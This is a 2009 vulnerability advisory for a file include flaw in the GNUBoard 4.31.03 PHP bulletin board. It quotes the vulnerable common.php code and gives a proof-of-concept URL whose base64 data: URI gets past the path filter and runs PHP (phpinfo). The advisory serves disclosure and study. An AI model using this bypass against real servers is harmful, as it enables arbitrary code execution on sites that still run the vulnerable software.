GNUBoard V4.31.03 (08.12.29) Local/Remote File Include Vulnerability BY Thx to qiuren/rayt TEAM:Wolves Security Team SITE: /************************* SIR GNUBoard (VERSION 4.31.03 (08.12.29))is a widely used bulletin board system of Korea. It is freely available for all platforms that supports PHP and MySQL. But we find a file include vulnerability affects SIR GNUBoard. In special conditions,it may be used as a remote file include vulnerability . This issue to execute arbitrary PHP code on an affected computer with the privileges of the affected Web server. Here is the details: **************************/ TEST ON VERSION 4.31.03 (08.12.29) /*************************** /common.php @extract($_GET); @extract($_POST); @extract($_SERVER); …… if (!$g4_path || preg_match("/:\/\//", $g4_path)) die(""); //if (!$g4_path) $g4_path = "."; //it's not allow char :// in $g4_path $g4['path'] = $g4_path; unset($g4_path); include_once("$g4[path]/lib/constant.php"); //file include include_once("$g4[path]/config.php"); include_once("$g4[path]/lib/common.lib.php"); *************************/ poc: when the site meets PHP >= 5.2.0&allow_url_include = On, we can use php data bypass preg_match("/:\/\//", $g4_path) it's became a Remote File Include Vulnerability poc: /************************* bypass_local.php bypass_local.php?g4_path=data:;base64,PD9waHBpbmZvKCk7Lyo= phpinfo() can be executed ***************************/ # [2009-01-15]